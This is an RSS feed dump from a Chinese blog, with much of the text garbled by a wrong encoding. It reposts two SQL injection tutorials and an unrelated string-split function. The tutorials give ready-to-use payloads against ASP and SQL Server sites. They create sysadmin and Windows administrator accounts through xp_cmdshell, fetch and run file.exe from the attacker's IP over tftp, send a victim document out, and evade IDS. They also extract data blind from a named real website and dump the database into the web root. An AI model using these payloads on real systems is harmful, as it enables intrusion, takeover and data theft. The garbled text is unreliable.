??xml version="1.0" encoding="utf-8" standalone="yes"?>国产一区不卡在线,少妇精品久久久,亚洲精品一区二区网址http://www.aygfsteel.com/lmsun/category/2322.htmlzh-cnFri, 02 Mar 2007 07:01:56 GMTFri, 02 Mar 2007 07:01:56 GMT60桂林老兵的SQLSERVER高注入技?转帖)http://www.aygfsteel.com/lmsun/archive/2006/02/05/29571.htmlmy javamy javaSun, 05 Feb 2006 02:04:00 GMThttp://www.aygfsteel.com/lmsun/archive/2006/02/05/29571.htmlhttp://www.aygfsteel.com/lmsun/comments/29571.htmlhttp://www.aygfsteel.com/lmsun/archive/2006/02/05/29571.html#Feedback0http://www.aygfsteel.com/lmsun/comments/commentRss/29571.htmlhttp://www.aygfsteel.com/lmsun/services/trackbacks/29571.html

[获得数据表名][字D值更Cؓ表名Q再xdq个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条g]


[获得数据表字D名][字D值更Cؓ字段名,再想法读个字D늚值就可得到字D名]
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条g]


也可以这hL获取表名Q?/P>


select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',?

通过SQLSERVER注入漏洞建数据库理员帐号和pȝ理员帐号[当前帐号必须是SYSADMINl]


news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //d数据库用L户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果x密码Q则用这句(test的密码改?23456Q?BR>news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //test加到sysadminl?q个l的成员可执行Q何操?BR>news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //dpȝ用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //系l用户test提升为管理员


q样Q你在他的数据库和系l内都留下了test理员̎号了

下面是如何从你的服器下蝲文gfile.exe后运行它[前提是你必须你的电脑设为TFTP服务器,?9端口打开]


id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--


然后q行q个文gQ?BR>id=2; exec master.dbo.xp_cmdshell 'file.exe';--


下蝲服务器的文gfile2.doc到本地TFTP服务器[文g必须存在]:


id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--


l过IDS的检[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm?’dshell' exec @a 'dir c:\'



my java 2006-02-05 10:04 发表评论
]]>
SQL注入天书http://www.aygfsteel.com/lmsun/archive/2006/02/05/29570.htmlmy javamy javaSun, 05 Feb 2006 01:58:00 GMThttp://www.aygfsteel.com/lmsun/archive/2006/02/05/29570.htmlhttp://www.aygfsteel.com/lmsun/comments/29570.htmlhttp://www.aygfsteel.com/lmsun/archive/2006/02/05/29570.html#Feedback0http://www.aygfsteel.com/lmsun/comments/commentRss/29570.htmlhttp://www.aygfsteel.com/lmsun/services/trackbacks/29570.html
QIQ注入是从正常的WWW端口讉KQ而且表面看v来跟一般的Web面讉K没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报Q如果管理员没查看IIS*志的习惯Q可能被入R很长旉都不会发觉?

但是QSQL注入的手法相当灵z,在注入的时候会到很多意外的情c能不能Ҏ具体情况q行分析Q构造y妙的SQL语句Q从而成功获取想要的数据Q是高手与“菜鸟”的Ҏ区别?

Ҏ国情Q国内的|站用ASP Access或SQLServer的占70%以上QPHP MySQ占L20%Q其他的不10%。在本文Q我们从分入门、进阶至高讲解一下ASP注入的方法及技巧,PHP注入的文章由NB联盟的另一位朋友zwell撰写Q希望对安全工作者和E序员都有用处。了解ASP注入的朋友也请不要蟩q入门篇Q因为部分hҎ入的基本判断Ҏq存在误区。大家准备好了吗QLet's Go...

???

如果你以前没试过QIQ注入的话,那么W一步先把IE菜单=>工具=>Internet选项=>高=>昄友好HTTP 错误信息前面的勾L。否则,不论服务器返回什么错误,IE都只昄为HTTP 500服务器错误,不能获得更多的提CZ息?

W一节、SQL注入原理

以下我们从一个网www.19cn.com开始(注:本文发表前已征得该站站长同意Q大部分都是真实数据Q?

在网站首上Q有名ؓ“IE不能打开新窗口的多种解决Ҏ”的链接Q地址为:http://www.19cn.com/showdetail.asp?id=49Q我们在q个地址后面加上单引号’,服务器会q回下面的错误提C:

Microsoft JET Database Engine 错误 '80040e14'字符串的语法错误 在查询表辑ּ 'ID=49'' 中?

/showdetail.aspQ行8

从这个错误提C我们能看出下面几点Q?

1.|站使用的是Access数据库,通过JET引擎q接数据库,而不是通过ODBC?

2. E序没有判断客户端提交的数据是否W合E序要求?

3. 该SQL语句所查询的表中有一名ؓID的字Dc?

从上面的例子我们可以知道QSQL注入的原理,是从客L提交Ҏ的代码,从而收集程序及服务器的信息Q从而获取你惛_得到的资料?

W二节、判断能否进行SQL注入

看完W一节,有一些h会觉得:我也是经常这h试能否注入的Q这不是很简单吗Q?

其实Q这q不是最好的ҎQؓ什么呢Q?
首先Q不一定每台服务器的IIS都返回具体错误提C给客户端,如果E序中加了cint(参数)之类语句的话QSQL注入是不会成功的Q但服务器同样会报错Q具体提CZ息ؓ处理 URL 时服务器上出错。请和系l管理员联络?

其次Q部分对QIQ注入有一点了解的E序员,认ؓ只要把单引号qo掉就安全了,q种情况不ؓ数Q如果你用单引号试Q是不到注入点的那么,什么样的测试方法才是比较准呢Q答案如下:

?http://www.19cn.com/showdetail.asp?id=49

?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=1

?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=2

q就是经典的1=1?=2试法了Q怎么判断呢?看看上面三个|址q回的结果就知道了:

可以注入的表玎ͼ

?正常昄Q这是必然的Q不然就是程序有错误了)

?正常昄Q内容基本与①相?

?提示BOF或EOFQ程序没做Q何判断时Q、或提示找不到记录(判断了rs.eofӞ、或昄内容为空Q程序加了on error resume nextQ不可以注入比较容易判断了Q①同样正常昄Q②和③一般都会有E序定义的错误提C,或提C类型{换时出错?

  当然Q这只是传入参数是数字型的时候用的判断方法,实际应用的时候会有字W型和搜索型参数Q我在中񔽋的“SQL注入一般步骤”再做分析?

W三节、判断数据库cd及注入方?

不同的数据库的函数、注入方法都是有差异的,所以在注入之前Q我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServerQ网上超q?9%的网站都是其中之一?

怎么让程序告诉你它用的什么数据库呢?来看看:

SQLServer有一些系l变量,如果服务器IIS提示没关闭,q且SQLServerq回错误提示的话Q那可以直接从出错信息获取,Ҏ如下Q?

http://www.19cn.com/showdetail.asp?id=49;;and user>0

q句语句很简单,但却包含了SQLServerҎ注入Ҏ的精髓,我自׃是在一ơ无意的试中发现这U效率极高的猜解Ҏ。让我看来看看它的含义:首先Q前面的语句是正常的Q重点在anduser>0Q我们知道,user是SQLServer的一个内|变量,它的值是当前q接的用户名Q类型ؓnvarchar。拿一个nvarchar的Dint的数0比较Q系l会先试囑ְnvarchar的D{成int型,当然Q{的过E中肯定会出错,SQLServer的出错提C是Q将nvarchar?”abc?转换数据cd?int 的列时发生语法错误,呵呵Qabc正是变量user的|q样Q不废吹C力就拿到了数据库的用户名。在以后的篇q里Q大家会看到很多用这U方法的语句?

Z说几句,众所周知QSQLServer的用户sa是个{同Adminstrators权限的角Ԍ拿到了sa权限Q几乎肯定可以拿C机的Administrator了。上面的Ҏ可以很方便的试出是否是用sadQ要注意的是Q如果是sadQ提C是”dbo”{换成int的列发生错误Q而不是”sa”?

如果服务器IIS不允许返回错误提C,那怎么判断数据库类型呢Q我们可以从Access和SQLServer和区别入手,Access和SQLServer都有自己的系l表Q比如存放数据库中所有对象的表,Access是在pȝ表[msysobjects]中,但在Web环境下读该表会提C“没有权限”,SQLServer是在表[sysobjects]中,在Web环境?

可正常读取?

在确认可以注入的情况下,使用下面的语句:

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from sysobjects)>0

http://www.19cn.com/showdetail.asp?id=49;;and(select count(*) from msysobjects)>0

如果数据库是SQLServerQ那么第一个网址的页面与原页?A target=_blank>http://www.19cn.com/showdetail.asp?id=49是大致相同的Q而第二个|址Q由于找不到表msysobjectsQ会提示出错Q就程序有定w处理Q页面也与原面完全不同?

如果数据库用的是AccessQ那么情况就有所不同Q第一个网址的页面与原页面完全不同;W二个网址Q则视乎数据库设|是否允许读该系l表Q一般来说是不允许的Q所以与原网址也是完全不同。大多数情况下,用第一个网址可以得知系l所用的数据库类型,W二个网址只作为开启IIS错误提示时的验证?

q???

在入门篇Q我们学会了QIQ注入的判断ҎQ但真正要拿到网站的保密内容Q是q远不够的。接下来Q我们就l箋学习如何从数据库中获取想要获得的内容Q首先,我们先看看SQL注入的一般步骤:

W一节、SQL注入的一般步?

首先Q判断环境,L注入点,判断数据库类型,q在入门已l讲q了?

其次Q根据注入参数类型,在脑中重构SQL语句的原貌,按参数类型主要分Z面三U:

(A) ID=49 q类注入的参数是数字型,SQL语句原貌大致如下Q?
Select * from 表名 where 字段=49
注入的参CؓID=49 And [查询条g]Q即是生成语句:
Select * from 表名 where 字段=49 And [查询条g]

(B) Class=q箋?q类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=’连l剧?
注入的参CؓClass=q箋剧?and [查询条g] and ‘??Q即是生成语句:
Select * from 表名 where 字段=’连l剧?and [查询条g] and ‘?’?

(C) 搜烦时没qo参数的,如keyword=关键字,SQL语句原貌大致如下Q?
Select * from 表名 where 字段like ?关键??
注入的参Cؓkeyword=?and [查询条g] and ??’, x生成语句Q?
Select * from 表名 where字段like ??and [查询条g] and ????

接着Q将查询条g替换成SQL语句Q猜解表名,例如Q?

ID=49 And (Select Count(*) from Admin)>=0

如果面׃ID=49的相同,说明附加条g成立Q即表Admin存在Q反之,即不存在Q请牢记q种ҎQ?

如此循环Q直至猜到表名ؓ止?

表名猜出来后Q将Count(*)替换成Count(字段?Q用同样的原理猜解字D名?

有h会说Q这里有一些偶然的成分Q如果表名v得很复杂没规律的Q那Ҏ没得玩下去了。说得很对,q世界根本就不存?00%成功的黑客技术,苍蝇不叮无缝的蛋Q无论多技术多高深的黑客,都是因ؓ别h的程序写得不严密或用者保密意识不够,才有得下手?

有点跑题了,话说回来Q对于SQLServer的库Q还是有办法让程序告诉我们表名及字段名的Q我们在高񔽋中会做介绍?

最后,在表名和列名猜解成功后,再用SQL语句Q得出字D늚|下面介绍一U最常用的方法-Ascii逐字解码法,虽然q种Ҏ速度很慢Q但肯定是可行的Ҏ?

我们举个例子Q已知表Admin中存在username字段Q首先,我们取第一条记录,试长度Q?

http://www.19cn.com/showdetail.asp?id=49;;and (select top 1 len(username) from Admin)>0

先说明原理:如果top 1的username长度大于0Q则条g成立Q接着是>1?gt;2?gt;3q样试下去Q一直到条g不成立ؓ止,比如>7成立Q?gt;8不成立,是len(username)=8

  当然没h会笨得从0,1,2,3一个个试Q怎么h比较快就看各自发挥了。在得到username的长度后Q用mid(username,N,1)截取WN位字W,再asc(mid(username,N,1))得到ASCII码,比如Q?

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步~小范围的方法得到第1位字W的ASCII码,注意的是英文和数字的ASCII码在1-128之间Q可以用折半法加速猜解,如果写成E序试Q效率会有极大的提高?

W二节、SQL注入常用函数

有SQL语言基础的hQ在QIQ注入的时候成功率比不熟悉的h高很多。我们有必要提高一下自qSQL水^Q特别是一些常用的函数及命令?

AccessQasc(字符) SQLServerQunicode(字符)

作用Q返回某字符的ASCII?

AccessQchr(数字) SQLServerQnchar(数字)

作用Q与asc相反Q根据ASCII码返回字W?

AccessQmid(字符?N,L) SQLServerQsubstring(字符?N,L)

作用Q返回字W串从N个字Wv长度为L的子字符Ԍ即N到N L之间的字W串

AccessQabc(数字) SQLServerQabc (数字)

作用Q返回数字的l对|在猜解汉字的时候会用到Q?

AccessQA between B And C SQLServerQA between B And C

作用Q判断A是否界于B与C之间

W三节、中文处理方?

在注入中到中文字符是常有的事,有些Z到中文字符想打退堂鼓了。其实只要对中文的编码有所了解Q“中文恐惧症”很快可以克服?

先说一点常识:

Access中,中文的ASCII码可能会出现负数Q取负数后用abs()取绝对|汉字字符不变?

SQLServer中,中文的ASCII为正敎ͼ但由于是UNICODE的双位编码,不能用函数ascii()取得ASCII码,必须用函数unicode ()q回unicode|再用nchar函数取得对应的中文字W?


了解了上面的两点后,是不是觉得中文猜解其实也跟英文差不多呢?除了使用的函数要注意、猜解范围大一点外Q方法是没什么两L?

?U??

看完入门和q阶后Q稍加练习,破解一般的|站是没问题了。但如果到表名列名猜不刎ͼ或程序作者过滤了一些特D字W,怎么提高注入的成功率Q怎么h高猜解效率?请大家接着往下看高񔽋?

W一节、利用系l表注入SQLServer数据?

SQLServer是一个功能强大的数据库系l,与操作系l也有紧密的联系Q这l开发者带来了很大的方便,但另一斚wQ也为注入者提供了一个蟩板,我们先来看看几个具体的例子:

?http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add?-

  分号;在SQLServer中表C隔开前后两句语句Q?-表示后面的语句ؓ注释Q所以,q句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储q程xp_cmdshellQ这个存储过E用于调用系l命令,于是Q用net命o新徏了用户名为name、密码ؓpassword的windows的帐P接着Q?

?http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators/add?-

  新建的帐号name加入理员组Q不用两分钟Q你已经拿到了系l最高权限!当然Q这U方法只适用于用saq接数据库的情况Q否则,是没有权限调用xp_cmdshell的?

  ?http://Site/url.asp?id=1 ;;and db_name()>0

前面有个cM的例子and user>0Q作用是获取q接用户名,db_name()是另一个系l变量,q回的是q接的数据库名?

?http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db?--q是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的l对路径Q将数据库备份到Web目录下面Q再用HTTP把整个数据库完完整整的下蝲回来Q所有的理员及用户密码都一览无遗!在不知道l对路径的时候,q可以备份到|络地址的方法(?A href="http://file:///202.96.xx.xxShare1.db" target=_blank>\\202.96.xx.xx\Share\1.dbQ,但成功率不高?

  ?http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’and status>0)>0

前面说过Qsysobjects是SQLServer的系l表Q存储着所有的表名、视图、约束及其它对象Qxtype=’U’and status>0Q表C用户徏立的表名Q上面的语句第一个表名取出,?比较大小Q让报错信息把表名暴露出来。第二、第三个表名怎么获取Q还是留l我们聪明的读者思考吧?

?http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名?,1) from sysobjects)>0

从⑤拿到表名后,用object_id(‘表名?获取表名对应的内部IDQcol_name(表名ID,1)代表该表的第1个字D名Q将1换成2,3,4...可以逐个获取所猜解表里面的字段名?

  以上6Ҏ我研ISQLServer注入半年多以来的心血l晶Q可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研ISQLServer注入之后Q我在开发方面的水^也得到很大的提高Q呵呵,也许安全与开发本来就是相辅相成的吧?

W二节、绕q程序限制l注?

在入门篇提到Q有很多人喜Ƣ用’号试注入漏洞Q所以也有很多h用过滤’号的方法来“防止”注入漏z,q也许能挡住一些入门者的dQ但对SQL注入比较熟悉的hQ还是可以利用相关的函数Q达到绕q程序限制的目的?

在“SQL注入的一般步骤”一节中Q我所用的语句Q都是经q我优化Q让其不包含有单引号的;在“利用系l表注入SQLServer数据库”中Q有些语句包含有’号Q我们D个例子来看看怎么攚w这些语句:

单的如where xtype=’U’,字符U对应的ASCII码是85Q所以可以用where xtype=char(85)代替Q如果字W是中文的,比如where name=’用户’,可以用where name=nchar(29992) nchar(25143)代替?

W三节、经验小l?

1.有些ZqoSelect、Update、Deleteq些关键字,但偏偏忘记区分大写Q所以大家可以用selecTq样试一下?

2.在猜不到字段名时Q不妨看看网站上的登录表单,一般ؓ了方便v见,字段名都与表单的输入框取相同的名字?

3.特别注意Q地址栏的 号传入程序后解释为空|+解释?P%解释?P具体可以参考URLEncode的相关介l?

4.用GetҎ注入ӞIIS会记录你所有的提交字符Ԍ对PostҎ做则不记录,所以能用Post的网址量不用Get?

5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用q种ҎQ只需要两者之间的区别卛_Q但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高?

????

QIQ注入漏z可谓是“千里之堤,溃于蚁穴”,q种漏洞在网上极为普遍,通常是由于程序员Ҏ入不了解Q或者程序过滤不严格Q或者某个参数忘记检查导致。在q里Q我l大家一个函敎ͼ代替ASP中的Request函数Q可以对一切的SQL注入Say NOQ函数如下:

function SafeRequest(ParaName,ParaType)
'--- 传入参数 ---
'ParaName:参数名称-字符?
'ParaType:参数cd-数字?1表示以上参数是数字,0表示以上参数为字W?

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型Q?
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

文章到这里就l束了,不管你是安全人员、技术爱好者还是程序员Q我都希望本文能对你有所帮助?BR>

my java 2006-02-05 09:58 发表评论
]]>
字符串分拆函?/title><link>http://www.aygfsteel.com/lmsun/archive/2005/07/26/8459.html</link><dc:creator>my java</dc:creator><author>my java</author><pubDate>Tue, 26 Jul 2005 02:24:00 GMT</pubDate><guid>http://www.aygfsteel.com/lmsun/archive/2005/07/26/8459.html</guid><wfw:comment>http://www.aygfsteel.com/lmsun/comments/8459.html</wfw:comment><comments>http://www.aygfsteel.com/lmsun/archive/2005/07/26/8459.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.aygfsteel.com/lmsun/comments/commentRss/8459.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/lmsun/services/trackbacks/8459.html</trackback:ping><description><![CDATA[<P>/*<BR> 字符串分拆函?BR> <BR>--调用CZ<BR> select * from dbo.fsplit('a;adf;fd;ed;dh',';')<BR> select * from dbo.fsplit('a,,adf,,fd,,ed,,dh',',,')<BR>邹徏 2003.07*/</P> <P>--查函数是否存?BR>if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[fsplit]') and xtype in (N'FN', N'IF', N'TF'))<BR> drop function [dbo].[fsplit]<BR>GO</P> <P>--创徏字符串分拆的函数<BR>create function fsplit(<BR>@str varchar(8000) --要分拆的字符?BR>,@spli varchar(10) --字符串分隔符<BR>)<BR>returns @re table(istr varchar(8000))<BR>as<BR>begin<BR> declare @i int,@splen int<BR> select @splen=len(@spli)<BR>  ,@i=charindex(@spli,@str)<BR> while @i>0<BR> begin<BR>  insert into @re values(left(@str,@i-1))<BR>  select @str=substring(@str,@i+@splen,8000)<BR>   ,@i=charindex(@spli,@str)<BR> end<BR> if @str<>'' insert into @re values(@str)<BR> return<BR>end</P> <P>select * from dbo.fsplit(123|abc|000|777','|')<BR></P><img src ="http://www.aygfsteel.com/lmsun/aggbug/8459.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/lmsun/" target="_blank">my java</a> 2005-07-26 10:24 <a href="http://www.aygfsteel.com/lmsun/archive/2005/07/26/8459.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss> <footer> <div class="friendship-link"> <a href="http://www.aygfsteel.com/" title="狠狠久久亚洲欧美专区_中文字幕亚洲综合久久202_国产精品亚洲第五区在线_日本免费网站视频">狠狠久久亚洲欧美专区_中文字幕亚洲综合久久202_国产精品亚洲第五区在线_日本免费网站视频</a> </div> </footer> վ֩ģ壺 <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">̨</a>| <a href="http://" target="_blank">ɳ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">¡</a>| <a href="http://" target="_blank">ˮ</a>| <a href="http://" target="_blank">ƽ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ݳ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">˰</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ƽ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">˫</a>| <a href="http://" target="_blank">ũ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">˾</a>| <a href="http://" target="_blank">̩</a>| <a href="http://" target="_blank">ˮ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ƺ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">ٲ</a>| <a href="http://" target="_blank">ֱ</a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank"></a>| <a href="http://" target="_blank">Դ</a>| <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </body>